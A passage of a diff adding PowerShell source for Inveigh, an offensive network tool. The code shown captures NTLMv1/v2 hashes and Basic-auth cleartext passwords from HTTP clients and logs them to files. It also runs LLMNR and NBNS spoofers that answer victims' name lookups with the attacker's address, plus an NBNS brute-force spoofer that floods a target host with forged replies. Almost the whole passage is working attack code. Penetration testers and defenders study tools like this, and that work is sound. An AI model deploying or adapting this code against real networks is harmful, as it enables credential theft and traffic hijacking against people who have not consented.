+                            $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
+                        
+                            if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                            {
+                                $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+                            }
+                            else
+                            {
+                                $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                            }
+
+                            if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+                            {
+                                $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
+                                $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file)
+                            }
+
+                            if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                            {
+                                $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                            }
+
+                        }
+
+                    }
+                    else # NTLMv2
+                    {         
+                        $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                        $NTLM_response = $NTLM_response.Insert(32,':')
+                        $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
+
+                        if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                        {
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])
+                            $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
+                        
+                            if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
+                            {
+                                $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n" + $HTTP_NTLM_hash)
+                            }
+                            else
+                            {
+                                $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string) for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
+                            }
+
+                            if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
+                            {
+                                $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
+                                $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
+                            }
+
+                            if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                            {
+                                $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
+                            }
+                        
+                        }
+
+                    }
+
+                    if ($inveigh.IP_capture_list -notcontains $HTTP_source_IP -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $HTTP_source_IP -ne $IP)
+                    {
+                        $inveigh.IP_capture_list.Add($HTTP_source_IP)
+                    }
+                
+                    $HTTP_response_status_code = 0x32,0x30,0x30
+                    $HTTP_response_phrase = 0x4f,0x4b
+                    $NTLM_auth = $true
+                    $HTTP_client_close = $true
+                    $NTLM_challenge = ""
+                }
+                else
+                {
+                    $NTLM = "NTLM"
+                    $HTTP_client_close = $false
+                }
+
+            }
+            elseif($authentication_header.startswith('Basic '))
+            {
+                $HTTP_response_status_code = 0x32,0x30,0x30
+                $HTTP_response_phrase = 0x4f,0x4b
+                $authentication_header = $authentication_header -replace 'Basic ',''
+                $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header))
+                $HTTP_client_close = $true
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from $HTTP_source_IP")])
+                $inveigh.cleartext_file_queue.Add($cleartext_credentials)
+                $inveigh.cleartext_list.Add($cleartext_credentials)
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials $cleartext_credentials captured from $HTTP_source_IP")
+
+                if($inveigh.file_output)
+                {
+                    $inveigh.console_queue.Add("Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file)
+                }
+                 
+            }
+            else
+            {
+                if($HTTPAuth -ne 'Anonymous' -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -ne 'Anonymous'))
+                {
+                    $HTTP_client_close = $false
+                }
+                else
+                {
+                    $HTTP_client_close = $true
+                }
+
+            }
+
+            $HTTP_timestamp = Get-Date -format r
+            $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+
+            if((($WPADIP -and $WPADPort) -or $WPADResponse -or $WPADEmptyFile -eq 'Y') -and $HTTP_request_raw_URL -match '/wpad.dat')
+            {
+                $HTTP_message = $HTTP_WPAD_response
+            }
+            elseif($HTTPResponse -and $HTTP_request_raw_URL -notmatch '/wpad.dat')
+            {
+                $HTTP_message = $HTTPResponse
+            }
+            else
+            {
+                $HTTP_message = ""
+            }
+
+            $HTTP_timestamp = Get-Date -format r
+            $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
+
+            if(($HTTPAuth -eq 'NTLM' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'NTLM' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$NTLM_auth)
+            { 
+                $NTLM = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
+                $HTTP_message_bytes = 0x0d,0x0a
+                $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+                $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+                $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                                    $HTTP_response_status_code +
+                                    0x20 +
+                                    $HTTP_response_phrase +
+                                    0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                                    0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                                    0x0a,0x44,0x61,0x74,0x65,0x3a +
+                                    $HTTP_timestamp +
+                                    0x0d,0x0a +
+                                    $HTTP_WWW_authenticate_header +
+                                    $NTLM +
+                                    0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                                    0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                                    0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                                    0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                                    $HTTP_content_length_bytes +
+                                    0x0d,0x0a +
+                                    $HTTP_message_bytes
+
+            }
+            elseif(($HTTPAuth -eq 'Basic' -and $HTTP_request_raw_URL -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Basic' -and $HTTP_request_raw_URL -match '/wpad.dat'))
+            {
+                $Basic = [System.Text.Encoding]::UTF8.GetBytes("Basic realm=$HTTPBasicRealm")
+                $HTTP_message_bytes = 0x0d,0x0a
+                $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+                $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+                $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                                    $HTTP_response_status_code +
+                                    0x20 +
+                                    $HTTP_response_phrase +
+                                    0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                                    0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                                    0x0a,0x44,0x61,0x74,0x65,0x3a +
+                                    $HTTP_timestamp +
+                                    0x0d,0x0a +
+                                    $HTTP_WWW_authenticate_header +
+                                    $Basic +
+                                    0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                                    0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                                    0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                                    0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                                    $HTTP_content_length_bytes +
+                                    0x0d,0x0a +
+                                    $HTTP_message_bytes
+
+            }
+            else
+            {
+                $HTTP_response_status_code = 0x32,0x30,0x30
+                $HTTP_response_phrase = 0x4f,0x4b
+                $HTTP_message_bytes = 0x0d,0x0a
+                $HTTP_content_length_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
+                $HTTP_message_bytes += [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
+
+                $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 +
+                                    $HTTP_response_status_code +
+                                    0x20 +
+                                    $HTTP_response_phrase +
+                                    0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,
+                                    0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,
+                                    0x0a,0x44,0x61,0x74,0x65,0x3a +
+                                    $HTTP_timestamp +
+                                    0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20,
+                                    0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73,
+                                    0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,
+                                    0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 +
+                                    $HTTP_content_length_bytes +
+                                    0x0d,0x0a +
+                                    $HTTP_message_bytes 
+            }
+
+            $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
+            $HTTP_stream.Flush()
+            Start-Sleep -m 10
+            $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
+            $HTTP_client_handle_old = $HTTP_client.Client.Handle
+
+            if($HTTP_client_close)
+            {
+                $HTTP_client.Close()
+
+                if($RunCount -gt 0 -and ($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext))
+                {
+                    $HTTP_listener.Stop()
+                    $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run count at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")])
+                    $inveigh.unprivileged_running = $false
+                    break HTTP_listener_loop                  
+                }
+
+            }
+
+        }
+        else
+        {
+            $HTTP_client.Close()
+            $HTTP_client_close = $true
+        }
+    
+    }
+
+    $HTTP_client.Close()
+    start-sleep -s 1
+    $HTTP_listener.Server.blocking = $false
+    Start-Sleep -s 1
+    $HTTP_listener.Server.Close()
+    Start-Sleep -s 1
+    $HTTP_listener.Stop()
+}
+
+$LLMNR_spoofer_scriptblock = 
+{
+    param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL)
+
+    $LLMNR_running = $true
+    $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355)
+
+    try
+    {
+        $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355
+    }
+    catch
+    {
+        $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")
+        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting LLMNR spoofer")])
+        $LLMNR_running = $false
+    }
+
+    $LLMNR_multicast_group = [IPAddress]"224.0.0.252"
+    $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
+    $LLMNR_UDP_client.Client.ReceiveTimeout = 5000
+
+    while($inveigh.unprivileged_running -and $LLMNR_running)
+    {   
+
+        $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async
+
+        if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now
+        {
+            $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL)
+            [Array]::Reverse($LLMNR_TTL_bytes)
+
+            $LLMNR_response_packet = $LLMNR_request_data[0,1] +
+                                     0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 +
+                                     $LLMNR_request_data[12..$LLMNR_request_data.Length] +
+                                     $LLMNR_request_data[12..$LLMNR_request_data.Length] +
+                                     $LLMNR_TTL_bytes +
+                                     0x00,0x04 +
+                                     ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes()
+        
+            $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)])     
+            $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString
+
+            if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
+            !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+            $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP))
+            {
+                $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port)
+                $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint)
+                $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length)
+                $LLMNR_UDP_client.Close()
+                $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355
+                $LLMNR_multicast_group = [IPAddress]"224.0.0.252"
+                $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group)
+                $LLMNR_UDP_client.Client.ReceiveTimeout = 5000
+                $LLMNR_response_message = "- response sent"
+            }
+            else
+            {
+
+                if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string)
+                {
+                    $LLMNR_response_message = "- $LLMNR_query_string is not on reply list"
+                }
+                elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string)
+                {
+                    $LLMNR_response_message = "- $LLMNR_query_string is on ignore list"
+                }
+                elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+                {
+                    $LLMNR_response_message = "- $source_IP is not on reply list"
+                }
+                elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+                {
+                    $LLMNR_response_message = "- $source_IP is on ignore list"
+                }
+                elseif($inveigh.IP_capture_list -contains $source_IP)
+                {
+                    $LLMNR_response_message = "- previous capture from $source_IP"
+                }
+                else
+                {
+                    $LLMNR_response_message = "- something went wrong"
+                }
+                                
+            }
+        
+            if($LLMNR_request_data)                   
+            {
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")])
+            }
+
+        $LLMNR_request_data = ""
+        }
+
+    }
+
+    $LLMNR_UDP_client.Close()
+ }
+
+$NBNS_spoofer_scriptblock = 
+{
+    param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL)
+
+    $NBNS_running = $true
+    $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137)
+
+    try
+    {
+        $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+    }
+    catch
+    {
+        $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")
+        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting NBNS spoofer")])
+        $NBNS_running = $false
+    }
+
+    $NBNS_UDP_client.Client.ReceiveTimeout = 5000
+
+    while($inveigh.unprivileged_running -and $NBNS_running)
+    {
+        
+        $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async
+
+        if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01')
+        {
+            $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+            [Array]::Reverse($NBNS_TTL_bytes)
+
+            $NBNS_response_packet = $NBNS_request_data[0,1] +
+                                    0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                                    $NBNS_request_data[13..$NBNS_request_data.Length] +
+                                    $NBNS_TTL_bytes +
+                                    0x00,0x06,0x00,0x00 +
+                                    ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                                    0x00,0x00,0x00,0x00
+
+            $source_IP = $NBNS_listener_endpoint.Address.IPAddressToString
+            $NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44])
+                    
+            switch ($NBNS_query_type)
+            {
+
+                '41-41'
+                {
+                    $NBNS_query_type = "00"
+                }
+
+                '41-44'
+                {
+                    $NBNS_query_type = "03"
+                }
+
+                '43-41'
+                {
+                    $NBNS_query_type = "20"
+                }
+
+                '42-4C'
+                {
+                    $NBNS_query_type = "1B"
+                }
+
+                '42-4D'
+                {
+                    $NBNS_query_type = "1C"
+                }
+
+                '42-4E'
+                {
+                    $NBNS_query_type = "1D"
+                }
+
+                '42-4F'
+                {
+                    $NBNS_query_type = "1E"
+                }
+
+            }
+
+            $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)])
+            $NBNS_query = $NBNS_query -replace "-00",""
+            $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+            $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length)
+            $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA"))
+            $NBNS_query_string_subtracted = ""
+            $NBNS_query_string = ""
+            $n = 0
+                            
+            do
+            {
+                $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65)
+                $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16))
+                $n += 1
+            }
+            until($n -gt ($NBNS_query_string_encoded.Length - 1))
+                    
+            $n = 0
+                    
+            do
+            {
+                $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16)))
+                $n += 2
+            }
+            until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15)
+                                 
+            if (($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
+            !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and (
+            $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type))
+            {
+                $NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137)
+                $NBNS_UDP_client.Connect($NBNS_destination_endpoint)
+                $NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length)
+                $NBNS_UDP_client.Close()
+                $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137
+                $NBNS_UDP_client.Client.ReceiveTimeout = 5000
+                $NBNS_response_message = "- response sent"
+            }
+            else
+            {
+
+                if($NBNSTypes -notcontains $NBNS_query_type)
+                {
+                    $NBNS_response_message = "- disabled NBNS type"
+                }
+                elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string)
+                {
+                    $NBNS_response_message = "- $NBNS_query_string is not on reply list"
+                }
+                elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string)
+                {
+                    $NBNS_response_message = "- $NBNS_query_string is on ignore list"
+                }
+                elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP)
+                {
+                    $NBNS_response_message = "- $source_IP is not on reply list"
+                }
+                elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP)
+                {
+                    $NBNS_response_message = "- $source_IP is on ignore list"
+                }
+                elseif($inveigh.IP_capture_list -contains $source_IP)
+                {
+                    $NBNS_response_message = "- previous capture from $source_IP"
+                }
+                else
+                {
+                    $NBNS_response_message = "- something went wrong"
+                }
+                                    
+            }
+
+            if($NBNS_request_data)                   
+            {
+                 $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")
+                 $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")])
+            }
+
+            $NBNS_request_data = ""
+        }
+
+    }
+
+    $NBNS_UDP_client.Close()
+ }
+
+$NBNS_bruteforce_spoofer_scriptblock = 
+{
+    param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL)
+   
+    $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper()
+
+    $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,
+                        0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00
+
+    $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost)
+    $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
+    $hostname_encoded = $hostname_encoded.Replace("-","")
+    $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded)
+    $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL)
+    [Array]::Reverse($NBNS_TTL_bytes)
+
+    for($i=0; $i -lt $hostname_encoded.Count; $i++)
+    {
+
+        if($hostname_encoded[$i] -gt 64)
+        {
+            $hostname_bytes[$i] = $hostname_encoded[$i] + 10
+        }
+        else
+        {
+            $hostname_bytes[$i] = $hostname_encoded[$i] + 17
+        }
+    
+    }
+
+    $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 +
+                            $hostname_bytes +
+                            0x00,0x20,0x00,0x01 +
+                            $NBNS_TTL_bytes +
+                            0x00,0x06,0x00,0x00 +
+                            ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() +
+                            0x00,0x00,0x00,0x00
+
+    $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")
+    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")])
+    $NBNS_paused = $false          
+    $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137)
+    $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget)
+    $destination_point = New-Object Net.IPEndpoint($destination_IP,137)
+    $NBNS_bruteforce_UDP_client.Connect($destination_point)
+       
+    while($inveigh.unprivileged_running)
+    {
+
+        :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.unprivileged_running)
+        {
+
+            if($NBNS_paused)
+            {
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")])
+                $NBNS_paused = $false
+            }
+
+            for ($i = 0; $i -lt 255; $i++)
+            {
+
+                for ($j = 0; $j -lt 255; $j++)
+                {
+                    $NBNS_response_packet[0] = $i
+                    $NBNS_response_packet[1] = $j                 
+                    $NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length)
+
+                    if($inveigh.hostname_spoof -and $NBNSBruteForcePause)
+                    {
+                        $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")])
+                        $NBNS_paused = $true
+                        break NBNS_spoofer_loop
+                    }
+                
+                }
+            
+            }
+        
+        }
+
+        Start-Sleep -m 5
+    }
+
+    $NBNS_bruteforce_UDP_client.Close()
+ }
+
+$control_unprivileged_scriptblock = 
+{
+    param ($NBNSBruteForcePause,$RunTime)
+
+    if($RunTime)
+    {    
+        $control_timeout = New-TimeSpan -Minutes $RunTime
+        $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+    }
+
+    if($NBNSBruteForcePause)
+    {   
+        $NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause
+    }
+       
+    while ($inveigh.unprivileged_running)
+    {
+
+        if($RunTime)
+        {
+            
+            if($control_stopwatch.Elapsed -ge $control_timeout)
+            {
+
+                if($inveigh.HTTP_listener.IsListening)
+                {
+                    $inveigh.HTTP_listener.Stop()
+                    $inveigh.HTTP_listener.Close()
+                }
+            
+                if($inveigh.unprivileged_running)
+                {                    
+                    $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited due to run time")])
+                    Start-Sleep -m 5
+                    $inveigh.unprivileged_running = $false
+                }
+            
+                if($inveigh.relay_running)
+                {
+                    $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")])
+                    Start-Sleep -m 5
+                    $inveigh.relay_running = $false
+                } 
+
+                if($inveigh.running)
+                {
+                    $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')")
+                    $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")])
+                    Start-Sleep -m 5
+                    $inveigh.running = $false
+                } 
+            
+            }
+        }
+
+        if($NBNSBruteForcePause -and $inveigh.hostname_spoof)
+        {
+         
+            if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause)
+            {
+                $inveigh.hostname_spoof = $false
+            }
+        
+        }
+
+        if($inveigh.file_output -and !$inveigh.running)
+        {
+
+            while($inveigh.log_file_queue.Count -gt 0)
+            {
+                $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append
+                $inveigh.log_file_queue.RemoveAt(0)
+            }
+
+            while($inveigh.NTLMv1_file_queue.Count -gt 0)
+            {
+                $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append
+                $inveigh.NTLMv1_file_queue.RemoveAt(0)
+            }
+
